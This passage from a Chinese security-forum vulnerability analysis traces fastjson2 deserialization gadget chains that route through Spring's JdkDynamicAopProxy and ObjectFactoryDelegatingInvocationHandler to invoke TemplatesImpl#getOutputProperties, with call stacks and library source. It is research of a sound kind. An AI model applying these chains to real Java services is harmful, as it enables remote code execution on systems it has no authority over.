<span class=hljs-keyword>return</span> Reflections.newInstance(<span class=hljs-string>"org.springframework.aop.framework.JdkDynamicAopProxy"</span>,AdvisedSupport.<span class=hljs-keyword>class</span>,<span class=hljs-keyword>as</span>);
}
}
</code></pre>
<p blockindex=60>我们构造的恶意 TemplatesImpl 作为 TargetSource<br>
<img src="
<p blockindex=61>因为代理的是 Templates</p>
<p blockindex=62><img src="
<p blockindex=63>可以看到是只有一个 getter 方法,所以调用栈如下</p>
<pre blockindex=64><code class="hljs language-php">invoke:<span class=hljs-number>160</span>, JdkDynamicAopProxy (org.springframework.aop.framework)
getOutputProperties:-<span class=hljs-number>1</span>, <span class=hljs-variable>$Proxy1</span> (com.sun.proxy)
write:-<span class=hljs-number>1</span>, OWG_1_1_<span class=hljs-variable>$Proxy1</span> (com.alibaba.fastjson2.writer)
write:<span class=hljs-number>3124</span>, JSONWriterUTF16 (com.alibaba.fastjson2)
toString:<span class=hljs-number>914</span>, JSONArray (com.alibaba.fastjson2)
readObject:<span class=hljs-number>86</span>, BadAttributeValueExpException (javax.management)
invoke0:-<span class=hljs-number>1</span>, NativeMethodAccessorImpl (sun.reflect)
invoke:<span class=hljs-number>62</span>, NativeMethodAccessorImpl (sun.reflect)
invoke:<span class=hljs-number>43</span>, DelegatingMethodAccessorImpl (sun.reflect)
invoke:<span class=hljs-number>497</span>, Method (java.lang.reflect)
invokeReadObject:<span class=hljs-number>1058</span>, ObjectStreamClass (java.io)
readSerialData:<span class=hljs-number>1900</span>, ObjectInputStream (java.io)
readOrdinaryObject:<span class=hljs-number>1801</span>, ObjectInputStream (java.io)
readObject0:<span class=hljs-number>1351</span>, ObjectInputStream (java.io)
readObject:<span class=hljs-number>371</span>, ObjectInputStream (java.io)
readObject:<span class=hljs-number>1396</span>, HashMap (java.util)
invoke0:-<span class=hljs-number>1</span>, NativeMethodAccessorImpl (sun.reflect)
invoke:<span class=hljs-number>62</span>, NativeMethodAccessorImpl (sun.reflect)
invoke:<span class=hljs-number>43</span>, DelegatingMethodAccessorImpl (sun.reflect)
invoke:<span class=hljs-number>497</span>, Method (java.lang.reflect)
invokeReadObject:<span class=hljs-number>1058</span>, ObjectStreamClass (java.io)
readSerialData:<span class=hljs-number>1900</span>, ObjectInputStream (java.io)
readOrdinaryObject:<span class=hljs-number>1801</span>, ObjectInputStream (java.io)
readObject0:<span class=hljs-number>1351</span>, ObjectInputStream (java.io)
readObject:<span class=hljs-number>371</span>, ObjectInputStream (java.io)
deserialize:<span class=hljs-number>53</span>, Util (common)
runGadgets:<span class=hljs-number>38</span>, Util (common)
main:<span class=hljs-number>24</span>, Fastjson4_JdkDynamicAopProxy
</code></pre>
<p blockindex=65>只会调用getOutputProperties 方法,触发我们的 invoke</p>
<p blockindex=66><img src=
<p blockindex=67>然后调用到我们 <code>TemplatesImpl#getOutputProperties</code> 方法成功实现中间过渡</p>
<p blockindex=68><img src="
<h2 blockindex=69>ObjectFactoryDelegatingInvocationHandler 绕过</h2>
<p blockindex=70>还是一样方法</p>
<p blockindex=71><img src=
<p blockindex=72>首先主体逻辑还是和上面一样的,核心还是代理 Templates 接口</p>
<p blockindex=73>我们看到 invoke 方法</p>
<pre blockindex=74><code class="hljs language-php"><span class=hljs-keyword>public</span> <span class=hljs-keyword>Object</span> invoke(<span class=hljs-keyword>Object</span> proxy, Method method, <span class=hljs-keyword>Object</span>[] args) throws <span class=hljs-built_in>Throwable</span> {
<span class=hljs-keyword>switch</span> (method.getName()) {
<span class=hljs-keyword>case</span> <span class=hljs-string>"equals"</span>:
<span class=hljs-keyword>return</span> proxy == args[<span class=hljs-number>0</span>];
<span class=hljs-keyword>case</span> <span class=hljs-string>"hashCode"</span>:
<span class=hljs-keyword>return</span> System.identityHashCode(proxy);
<span class=hljs-keyword>case</span> <span class=hljs-string>"toString"</span>:
<span class=hljs-keyword>return</span> this.objectFactory.toString();
<span class=hljs-keyword>default</span>:
<span class=hljs-keyword>try</span> {
<span class=hljs-keyword>return</span> method.invoke(this.objectFactory.getObject(), args);
} <span class=hljs-keyword>catch</span> (InvocationTargetException var6) {
<span class=hljs-keyword>throw</span> var6.getTargetException();
}
}
}
</code></pre>
<p blockindex=75>可以看到逻辑,还是一样的,不过区别在于我们的对象是 this.objectFactory.getObject()获取的了</p>
<p blockindex=76>目的就是需要它返回我们的 teamplatesImpl 对象</p>
<p blockindex=77>首先我们寻找继承了 ObjectFactory 的类</p>
<p blockindex=78><img src=
<p blockindex=79>也不太多</p>
<p blockindex=80>找了一下确实没有能够利用的<br>
这里师傅的想法是</p>
<p blockindex=81>用 JSONObject 代理 ObjectFactoryDelegatingInvocationHandler 中的 objectFactory 属性,返回 teamplatesImpl</p>
<p blockindex=82>说真的,简直很妙<br>
我们看到 invoke 方法</p>
<p blockindex=83><img src=
<p blockindex=84>没想到它也是一个代理类</p>
<p blockindex=85>调试分析一下</p>
<pre blockindex=86><code class="hljs language-php">invoke:<span class=hljs-number>292</span>, AutowireUtils<span class=hljs-variable>$ObjectFactoryDelegatingInvocationHandler</span> (org.springframework.beans.factory.support)
getOutputProperties:-<span class=hljs-number>1</span>, <span class=hljs-variable>$Proxy2</span> (com.sun.proxy)
write:-<span class=hljs-number>1</span>, OWG_1_1_<span class=hljs-variable>$Proxy2</span> (com.alibaba.fastjson2.writer)
write:<span class=hljs-number>3124</span>, JSONWriterUTF16 (com.alibaba.fastjson2)
toString:<span class=hljs-number>914</span>, JSONArray (com.alibaba.fastjson2)
readObject:<span class=hljs-number>86</span>, BadAttributeValueExpException (javax.management)
invoke0:-<span class=hljs-number>1</span>, NativeMethodAccessorImpl (sun.reflect)
invoke:<span class=hljs-number>62</span>, NativeMethodAccessorImpl (sun.reflect)
invoke:<span class=hljs-number>43</span>, DelegatingMethodAccessorImpl (sun.reflect)
invoke:<span class=hljs-number>497</span>, Method (java.lang.reflect)
invokeReadObject:<span class=hljs-number>1058</span>, ObjectStreamClass (java.io)
readSerialData:<span class=hljs-number>1900</span>, ObjectInputStream (java.io)
readOrdinaryObject:<span class=hljs-number>1801</span>, ObjectInputStream (java.io)
readObject0:<span class=hljs-number>1351</span>, ObjectInputStream (java.io)
readObject:<span class=hljs-number>371</span>, ObjectInputStream (java.io)
readObject:<span class=hljs-number>1396</span>, HashMap (java.util)
invoke0:-<span class=hljs-number>1</span>, NativeMethodAccessorImpl (sun.reflect)
invoke:<span class=hljs-number>62</span>, NativeMethodAccessorImpl (sun.reflect)
invoke:<span class=hljs-number>43</span>, DelegatingMethodAccessorImpl (sun.reflect)
invoke:<span class=hljs-number>497</span>, Method (java.lang.reflect)
invokeReadObject:<span class=hljs-number>1058</span>, ObjectStreamClass (java.io)
readSerialData:<span class=hljs-number>1900</span>, ObjectInputStream (java.io)
readOrdinaryObject:<span class=hljs-number>1801</span>, ObjectInputStream (java.io)
readObject0:<span class=hljs-number>1351</span>, ObjectInputStream (java.io)
readObject:<span class=hljs-number>371</span>, ObjectInputStream (java.io)
deserialize:<span class=hljs-number>53</span>, Util (common)
runGadgets:<span class=hljs-number>38</span>, Util (common)
main:<span class=hljs-number>33</span>, Fastjson4_ObjectFactoryDelegatingInvocationHandler
</code></pre>
<p blockindex=87><img src="
<p blockindex=88>然后调用 JSONObject 的 invoke 方法</p>
<pre blockindex=89><code class="hljs language-php"><span class=hljs-keyword>public</span> <span class=hljs-keyword>Object</span> invoke(<span class=hljs-keyword>Object</span> proxy, Method method, <span class=hljs-keyword>Object</span>[] args) throws <span class=hljs-built_in>Throwable</span> {
<span class=hljs-keyword>String</span> methodName = method.getName();
<span class=hljs-keyword>int</span> parameterCount = method.getParameterCount();
<span class=hljs-class><span class=hljs-keyword>Class</span>&amp;<span class=hljs-title>lt</span>;?&amp;<span class=hljs-title>gt</span>; <span class=hljs-title>returnType</span> = <span class=hljs-title>method</span>.<span class=hljs-title>getReturnType</span>();
<span class=hljs-title>if</span> (<span class=hljs-title>parameterCount</span> == 1) </span>{
<span class=hljs-keyword>if</span> (<span class=hljs-string>"equals"</span>.equals(methodName)) {
<span class=hljs-keyword>return</span> this.equals(args[<span class=hljs-number>0</span>]);
} <span class=hljs-keyword>else</span> {
<span class=hljs-class><span class=hljs-keyword>Class</span> <span class=hljs-title>proxyInterface</span> = <span class=hljs-title>null</span>;
<span class=hljs-title>Class</span>&amp;<span class=hljs-title>lt</span>;?&amp;<span class=hljs-title>gt</span>;[] <span class=hljs-title>interfaces</span> = <span class=hljs-title>proxy</span>.<span class=hljs-title>getClass</span>().<span class=hljs-title>getInterfaces</span>();
<span class=hljs-title>if</span> (<span class=hljs-title>interfaces</span>.<span class=hljs-title>length</span> == 1) </span>{
proxyInterface = interfaces[<span class=hljs-number>0</span>];
}
<span class=hljs-keyword>if</span> (returnType != <span class=hljs-keyword>Void</span>.TYPE &amp;amp;&amp;amp; returnType != proxyInterface) {
<span class=hljs-keyword>throw</span> <span class=hljs-keyword>new</span> JSONException(<span class=hljs-string>"This method '"</span> + methodName + <span class=hljs-string>"' is not a setter"</span>);
} <span class=hljs-keyword>else</span> {
<span class=hljs-keyword>String</span> name = this.getJSONFieldName(method);
<span class=hljs-keyword>if</span> (name == <span class=hljs-literal>null</span>) {
<span class=hljs-keyword>if</span> (!methodName.startsWith(<span class=hljs-string>"set"</span>)) {
<span class=hljs-keyword>throw</span> <span class=hljs-keyword>new</span> JSONException(<span class=hljs-string>"This method '"</span> + methodName + <span class=hljs-string>"' is not a setter"</span>);
}
name = methodName.substring(<span class=hljs-number>3</span>);
<span class=hljs-keyword>if</span> (name.length() == <span class=hljs-number>0</span>) {
<span class=hljs-keyword>throw</span> <span class=hljs-keyword>new</span> JSONException(<span class=hljs-string>"This method '"</span> + methodName + <span class=hljs-string>"' is an illegal setter"</span>);
}
name = Character.toLowerCase(name.charAt(<span class=hljs-number>0</span>)) + name.substring(<span class=hljs-number>1</span>);
}
this.put(name, args[<span class=hljs-number>0</span>]);
<span class=hljs-keyword>return</span> returnType != <span class=hljs-keyword>Void</span>.TYPE ? proxy : <span class=hljs-literal>null</span>;
}
}
} <span class=hljs-keyword>else</span> <span class=hljs-keyword>if</span> (parameterCount == <span class=hljs-number>0</span>) {
<span class=hljs-keyword>if</span> (returnType == <span class=hljs-keyword>Void</span>.TYPE) {
<span class=hljs-keyword>throw</span> <span class=hljs-keyword>new</span> JSONException(<span class=hljs-string>"This method '"</span> + methodName + <span class=hljs-string>"' is not a getter"</span>);
} <span class=hljs-keyword>else</span> {
<span class=hljs-keyword>String</span> name = this.getJSONFieldName(method);
<span class=hljs-keyword>Object</span> value;
<span class=hljs-keyword>if</span> (name == <span class=hljs-literal>null</span>) {
<span class=hljs-keyword>boolean</span> with = <span class=hljs-literal>false</span>;
<span class=hljs-keyword>int</span> prefix;
<span class=hljs-keyword>if</span> ((methodName.startsWith(<span class=hljs-string>"get"</span>) || (with = methodName.startsWith(<span class=hljs-string>"with"</span>))) &amp;amp;&amp;amp; methodName.length() &amp;gt; (prefix = with ? <span class=hljs-number>4</span> : <span class=hljs-number>3</span>)) {
char[] chars = <span class=hljs-keyword>new</span> char[methodName.length() - prefix];
methodName.getChars(prefix, methodName.length(), chars, <span class=hljs-number>0</span>);
<span class=hljs-keyword>if</span> (chars[<span class=hljs-number>0</span>] &amp;gt;= <span class=hljs-string>'A'</span> &amp;amp;&amp;amp; chars[<span class=hljs-number>0</span>] &amp;lt;= <span class=hljs-string>'Z'</span>) {
chars[<span class=hljs-number>0</span>] = (char)(chars[<span class=hljs-number>0</span>] + <span class=hljs-number>32</span>);
}
<span class=hljs-keyword>String</span> fieldName = <span class=hljs-keyword>new</span> <span class=hljs-keyword>String</span>(chars);
<span class=hljs-keyword>if</span> (fieldName.isEmpty()) {
<span class=hljs-keyword>throw</span> <span class=hljs-keyword>new</span> JSONException(<span class=hljs-string>"This method '"</span> + methodName + <span class=hljs-string>"' is an illegal getter"</span>);
}
value = this.get(fieldName);
<span class=hljs-keyword>if</span> (value == <span class=hljs-literal>null</span>) {
<span class=hljs-keyword>return</span> <span class=hljs-literal>null</span>;
}
} <span class=hljs-keyword>else</span> {
<span class=hljs-keyword>if</span> (!methodName.startsWith(<span class=hljs-string>"is"</span>)) {
<span class=hljs-keyword>if</span> (<span class=hljs-string>"hashCode"</span>.equals(methodName)) {
<span class=hljs-keyword>return</span> this.hashCode();
}
<span class=hljs-keyword>if</span> (<span class=hljs-string>"toString"</span>.equals(methodName)) {
<span class=hljs-keyword>return</span> this.toString();
}
<span class=hljs-keyword>if</span> (methodName.startsWith(<span class=hljs-string>"entrySet"</span>)) {
<span class=hljs-keyword>return</span> this.entrySet();
}
<span class=hljs-keyword>if</span> (<span class=hljs-string>"size"</span>.equals(methodName)) {
<span class=hljs-keyword>return</span> this.size();
}
<span class=hljs-class><span class=hljs-keyword>Class</span>&amp;<span class=hljs-title>lt</span>;?&amp;<span class=hljs-title>gt</span>; <span class=hljs-title>declaringClass</span> = <span class=hljs-title>method</span>.<span class=hljs-title>getDeclaringClass</span>();
<span class=hljs-title>if</span> (<span class=hljs-title>declaringClass</span>.<span class=hljs-title>isInterface</span>() &amp;<span class=hljs-title>amp</span>;&amp;<span class=hljs-title>amp</span>; !<span class=hljs-title>Modifier</span>.<span class=hljs-title>isAbstract</span>(<span class=hljs-title>method</span>.<span class=hljs-title>getModifiers</span>()) &amp;<span class=hljs-title>amp</span>;&amp;<span class=hljs-title>amp</span>; !<span class=hljs-title>JDKUtils</span>.<span class=hljs-title>ANDROID</span> &amp;<span class=hljs-title>amp</span>;&amp;<span class=hljs-title>amp</span>; !<span class=hljs-title>JDKUtils</span>.<span class=hljs-title>GRAAL</span>) </span>{
MethodHandles.Lookup lookup = JDKUtils.trustedLookup(declaringClass);
MethodHandle methodHandle = lookup.findSpecial(declaringClass, method.getName(), MethodType.methodType(returnType), declaringClass);
<span class=hljs-keyword>return</span> methodHandle.invoke(proxy);
}
<span class=hljs-keyword>throw</span> <span class=hljs-keyword>new</span> JSONException(<span class=hljs-string>"This method '"</span> + methodName + <span class=hljs-string>"' is not a getter"</span>);
}
<span class=hljs-keyword>if</span> (<span class=hljs-string>"isEmpty"</span>.equals(methodName)) {
value = this.get(<span class=hljs-string>"empty"</span>);
<span class=hljs-keyword>if</span> (value == <span class=hljs-literal>null</span>) {
<span class=hljs-keyword>return</span> this.isEmpty();
}
} <span class=hljs-keyword>else</span> {
name = methodName.substring(<span class=hljs-number>2</span>);
<span class=hljs-keyword>if</span> (name.isEmpty()) {
<span class=hljs-keyword>throw</span> <span class=hljs-keyword>new</span> JSONException(<span class=hljs-string>"This method '"</span> + methodName + <span class=hljs-string>"' is an illegal getter"</span>);
}
name = Character.toLowerCase(name.charAt(<span class=hljs-number>0</span>)) + name.substring(<span class=hljs-number>1</span>);
value = this.get(name);
<span class=hljs-keyword>if</span> (value == <span class=hljs-literal>null</span>) {
<span class=hljs-keyword>return</span> <span class=hljs-literal>false</span>;
}
}
}
} <span class=hljs-keyword>else</span> {
value = this.get(name);
<span class=hljs-keyword>if</span> (value == <span class=hljs-literal>null</span>) {
<span class=hljs-keyword>return</span> <span class=hljs-literal>null</span>;
}
}
<span class=hljs-keyword>if</span> (!returnType.isInstance(value)) {
<span class=hljs-function><span class=hljs-keyword>Function</span> <span class=hljs-title>typeConvert</span> = <span class=hljs-title>JSONFactory</span>.<span class=hljs-title>getDefaultObjectReaderProvider</span>(<span class=hljs-params></span>).<span class=hljs-title>getTypeConvert</span>(<span class=hljs-params>value.getClass(<span class=hljs-params></span>), method.getGenericReturnType(<span class=hljs-params></span>)</span>)</span>;
<span class=hljs-keyword>if</span> (typeConvert != <span class=hljs-literal>null</span>) {
value = typeConvert.apply(value);
}
}
<span class=hljs-keyword>return</span> value;
}
} <span class=hljs-keyword>else</span> {
<span class=hljs-keyword>throw</span> <span class=hljs-keyword>new</span> UnsupportedOperationException(method.toGenericString());
}
}
</code></pre>
<p blockindex=90>最后返回的是 value我们主要关心 value</p>
<p blockindex=91>因为我们调用的方法是 getObejct\<br>
会进入如下的 if</p>
<pre blockindex=92><code class="hljs language-php"><span class=hljs-keyword>if</span> ((methodName.startsWith(<span class=hljs-string>"get"</span>) || (with = methodName.startsWith(<span class=hljs-string>"with"</span>))) &amp;amp;&amp;amp; methodName.length() &amp;gt; (prefix = with ? <span class=hljs-number>4</span> : <span class=hljs-number>3</span>)) {
char[] chars = <span class=hljs-keyword>new</span> char[methodName.length() - prefix];
methodName.getChars(prefix, methodName.length(), chars, <span class=hljs-number>0</span>);
<span class=hljs-keyword>if</span> (chars[<span class=hljs-number>0</span>] &amp;gt;= <span class=hljs-string>'A'</span> &amp;amp;&amp;amp; chars[<span class=hljs-number>0</span>] &amp;lt;= <span class=hljs-string>'Z'</span>) {
chars[<span class=hljs-number>0</span>] = (char)(chars[<span class=hljs-number>0</span>] + <span class=hljs-number>32</span>);
}
<span class=hljs-keyword>String</span> fieldName = <span class=hljs-keyword>new</span> <span class=hljs-keyword>String</span>(chars);
<span class=hljs-keyword>if</span> (fieldName.isEmpty()) {
<span class=hljs-keyword>throw</span> <span class=hljs-keyword>new</span> JSONException(<span class=hljs-string>"This method '"</span> + methodName + <span class=hljs-string>"' is an illegal getter"</span>);
}
value = this.get(fieldName);
<span class=hljs-keyword>if</span> (value == <span class=hljs-literal>null</span>) {
<span class=hljs-keyword>return</span> <span class=hljs-literal>null</span>;
}
</code></pre>
<p blockindex=93><img src=
<p blockindex=94><img src="
<p blockindex=95>可以看出来是取出了我们的对象,成功达成目的</p>
<p blockindex=96><img src=
<p blockindex=97><img src=
<p blockindex=98>最后成功达成目的</p></div></div>
</div>
<div class="post-opt mt-30">
<ul class="list-inline text-muted">
<li>
<i class="fa fa-clock-o"></i>
发表于 2025-02-19 09:00:00
</li>
<li>阅读 ( 301 )</li>
<li>分类:<a href=https://forum.butian.net/community/Vul_analysis target=_blank rel="noopenner noreferrer">漏洞分析</a>
</li>
</ul>
</div>
</div>
<div class="text-center mt-30 mb-20">
<button id=support-button class="btn btn-success btn-lg mr-5" data-loading-text=加载中... data-source_type=community data-source_id=4153 data-support_num=0> 0 推荐</button>
<button id=collect-button class="btn btn-default btn-lg" data-loading-text=加载中... data-source_type=community data-source_id=4153> 收藏</button>
</div>
</div>
<div class="widget-answers mt-15">
<h2 class="h4 post-title">0 条评论</h2>
<div class=comment>
</div>
<div class="widget-comment-form row mt-20 mb-20">
<div class=col-md-12>
请先 <a class=a_unLogin href=https://forum.butian.net/login>登录</a> 后评论
</div>
</div>
<div class=text-center>
</div>
</div>
</div>
</div>
</div>
</div>
<footer id=footer>
<div class=container>
<div class=text-center>
<a href=https://forum.butian.net/>奇安信攻防社区</a><span class=span-line>|</span>
<a href=mailto:butian_report@qianxin.com target=_blank rel="noopenner noreferrer">联系我们</a><span class=span-line>|</span>
<a href=https://forum.butian.net/sitemap>sitemap</a>
</div>
<div class="copyright mt-10">
Copyright © 2013-2023 BUTIAN.NET 版权所有 <a href=https://beian.miit.gov.cn/#/Integrated/index>京ICP备18014330号-2</a>
</div>
</div>
</footer>
<div class="modal fade sf-hidden" id=sendTo_message_model tabindex=-1 role=dialog aria-labelledby=exampleModalLabel>
</div>
<div class="modal fade sf-hidden" id=send_report_model role=dialog aria-labelledby=exampleModalLabel>
</div> <div class="modal fade in sf-hidden" id=payment-qrcode-modal-article-4153 tabindex=-1 role aria-labelledby=exampleModalLabel aria-hidden=false>
</div>
<div style="display:none;position:fixed;top:40%;left:50%;z-index:9999;transform:translate(-50%,-50%);padding:3px 15px;border-radius:8px;background:rgba(120,120,120,0.7);box-shadow:1px 1px 3px 1px rgba(160,160,160,0.6);text-align:center;font-size:12px;color:#fff"></div><div id=windowLoading class="modal fade sf-hidden" tabindex=-1 role=dialog>
</div>
<span id=cnzz_stat_icon_1279782571></span>
<div class="geetest_panel geetest_wind" style=display:none></div><div id=immersive-translate-popup style=all:initial><template shadowrootmode=open><style class=sf-hidden>/*!
* Pico.css v1.5.6 (https://picocss.com)
* Copyright 2019-2022 - Licensed under MIT
*/#mount{--font-family:system-ui,-apple-system,"Segoe UI","Roboto","Ubuntu","Cantarell","Noto Sans",sans-serif,"Apple Color Emoji","Segoe UI Emoji","Segoe UI Symbol","Noto Color Emoji";--line-height:1.5;--font-weight:400;--font-size:16px;--border-radius:0.25rem;--border-width:1px;--outline-width:3px;--spacing:1rem;--typography-spacing-vertical:1.5rem;--block-spacing-vertical:calc(var(--spacing)*2);--block-spacing-horizontal:var(--spacing);--grid-spacing-vertical:0;--grid-spacing-horizontal:var(--spacing);--form-element-spacing-vertical:0.75rem;--form-element-spacing-horizontal:1rem;--nav-element-spacing-vertical:1rem;--nav-element-spacing-horizontal:0.5rem;--nav-link-spacing-vertical:0.5rem;--nav-link-spacing-horizontal:0.5rem;--form-label-font-weight:var(--font-weight);--transition:0.2s ease-in-out;--modal-overlay-backdrop-filter:blur(0.25rem)}@media (min-width:576px){#mount{--font-size:17px}}@media (min-width:768px){#mount{--font-size:18px}}@media (min-width:992px){#mount{--font-size:19px}}@media (min-width:1200px){#mount{--font-size:20px}}@media (min-width:576px){#mount>header,#mount>main,#mount>footer,section{--block-spacing-vertical:calc(var(--spacing)*2.5)}}@media (min-width:768px){#mount>header,#mount>main,#mount>footer,section{--block-spacing-vertical:calc(var(--spacing)*3)}}@media (min-width:992px){#mount>header,#mount>main,#mount>footer,section{--block-spacing-vertical:calc(var(--spacing)*3.5)}}@media (min-width:1200px){#mount>header,#mount>main,#mount>footer,section{--block-spacing-vertical:calc(var(--spacing)*4)}}@media (min-width:576px){article{--block-spacing-horizontal:calc(var(--spacing)*1.25)}}@media (min-width:768px){article{--block-spacing-horizontal:calc(var(--spacing)*1.5)}}@media (min-width:992px){article{--block-spacing-horizontal:calc(var(--spacing)*1.75)}}@media (min-width:1200px){article{--block-spacing-horizontal:calc(var(--spacing)*2)}}dialog>article{--block-spacing-vertical:calc(var(--spacing)*2);--block-spacing-horizontal:var(--spacing)}@media (min-width:576px){dialog>article{--block-spacing-vertical:calc(var(--spacing)*2.5);--block-spacing-horizontal:calc(var(--spacing)*1.25)}}@media (min-width:768px){dialog>article{--block-spacing-vertical:calc(var(--spacing)*3);--block-spacing-horizontal:calc(var(--spacing)*1.5)}}a{--text-decoration:none}a.secondary,a.contrast{--text-decoration:underline}small{--font-size:0.875em}h1,h2,h3,h4,h5,h6{--font-weight:700}h1{--font-size:2rem;--typography-spacing-vertical:3rem}h2{--font-size:1.75rem;--typography-spacing-vertical:2.625rem}h3{--font-size:1.5rem;--typography-spacing-vertical:2.25rem}h4{--font-size:1.25rem;--typography-spacing-vertical:1.874rem}h5{--font-size:1.125rem;--typography-spacing-vertical:1.6875rem}[type="checkbox"],[type="radio"]{--border-width:2px}[type="checkbox"][role="switch"]{--border-width:3px}thead th,thead td,tfoot th,tfoot td{--border-width:3px}:not(thead,tfoot)>*>td{--font-size:0.875em}pre,code,kbd,samp{--font-family:"Menlo","Consolas","Roboto Mono","Ubuntu Monospace","Noto Mono","Oxygen Mono","Liberation Mono",monospace,"Apple Color Emoji","Segoe UI Emoji","Segoe UI Symbol","Noto Color Emoji"}kbd{--font-weight:bolder}[data-theme="light"],#mount:not([data-theme="dark"]){--background-color:#fff;--background-light-green:#F5F7F9;--color:hsl(205deg,20%,32%);--h1-color:hsl(205deg,30%,15%);--h2-color:#24333e;--h3-color:hsl(205deg,25%,23%);--h4-color:#374956;--h5-color:hsl(205deg,20%,32%);--h6-color:#4d606d;--muted-color:hsl(205deg,10%,50%);--muted-border-color:hsl(205deg,20%,94%);--primary:hsl(195deg,85%,41%);--primary-hover:hsl(195deg,90%,32%);--primary-focus:rgba(16,149,193,0.125);--primary-inverse:#fff;--secondary:hsl(205deg,15%,41%);--secondary-hover:hsl(205deg,20%,32%);--secondary-focus:rgba(89,107,120,0.125);--secondary-inverse:#fff;--contrast:hsl(205deg,30%,15%);--contrast-hover:#000;--contrast-focus:rgba(89,107,120,0.125);--contrast-inverse:#fff;--mark-background-color:#fff2ca;--mark-color:#543a26;--ins-color:#388e3c;--del-color:#c62828;--blockquote-border-color:var(--muted-border-color);--blockquote-footer-color:var(--muted-c